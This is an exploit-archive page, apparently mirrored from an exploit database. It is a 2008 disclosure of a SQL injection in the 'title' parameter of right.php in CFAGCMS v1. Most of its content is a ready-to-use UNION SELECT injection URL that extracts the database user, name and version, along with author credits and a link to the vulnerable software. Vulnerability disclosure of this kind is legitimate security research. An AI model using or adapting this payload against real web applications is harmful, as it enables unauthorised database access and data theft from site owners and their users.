[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CFAGCMS v1 (right.php title) SQL Injection Vulnerability
# Published : 2008-12-15
# Author : ZoRLu
# Previous Title : Aperto Blog 0.1.1 Local File Inclusion / SQL Injection Vulnerabilities
# Next Title : Click&BaneX Multiple Remote SQL Injection Vulnerabilities
cfagcms Beta 1 sql inj.
download: http://mesh.dl.sourceforge.net/sourceforge/cfagcms/cfagcms.zip
Discovered By: ZoRLu
z0rlu.blogspot.com
trt-turk@hotmail.com
date: 23.10.2008
N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
------------------------------------------------------------------
exploit:
http://localhost/cfagcms/right.php?title=[SQL]
[SQL]=
ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
------------------------------------------------------------------
thanks: str0ke
a.q kpss
# www.Syue.com [2008-12-15]